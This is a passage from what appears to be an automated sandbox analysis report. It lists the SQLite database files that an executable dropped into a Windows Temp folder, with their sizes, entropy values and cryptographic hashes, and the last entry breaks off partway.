                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\5ojfLofga8

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.848598812124929
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                    MD5:9664DAA86F8917816B588C715D97BE07
                                                                    SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                    SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                    SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\5rBMoagqwi

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\60wNxaMw7y

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\62IsT7m1kE

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\6FvNpGWoCU

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\6dlNcDaeqg

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\6h54on77Ow

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.3909341910495931
                                                                    Encrypted:false
                                                                    SSDEEP:48:ToyFawNLopFgU10XJBjKwsBjAFMtt/qEM0g9gingQeroAsaC7cUXt9P:cyxe8OwsiFMttSzefroYC7J9P
                                                                    MD5:1EB30D95ED94CA01369986C3811A0591
                                                                    SHA1:D7277FF6C5D5F55A4B0576045C2928D7501E7AFC
                                                                    SHA-256:CA8D4F98E4AD0ED1F66819E90024EB527A7A46DC26D84FB9FF5F1829B6331F46
                                                                    SHA-512:D5C8BA028977ABA2416D2C02D50FD2535F646003D8F443A01E00C6FC9385F16A6C051502D3947CABF592C619E3E0A22EC586AD57876E517C7B5BB749D396ABA7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\6mapn1RKWN

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\6qdGVBgWkD

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\6rokFgyZVk

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\7GwaZKn2mO

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\7IDFSDVkKW

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\7LBVXVazVp

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\7OToB8FBBB

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\7OV7ZiUIoG

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.848598812124929
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                    MD5:9664DAA86F8917816B588C715D97BE07
                                                                    SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                    SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                    SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\7XrhChUtIU

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\7Y7NOcq2hW

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\7YPK3d6oow

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\7ZlHFxZ8Bj

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\7bxxuAQsOL

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\7cPaAU63iP

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\7sJM2vUI5W

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\843kymyrwc

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
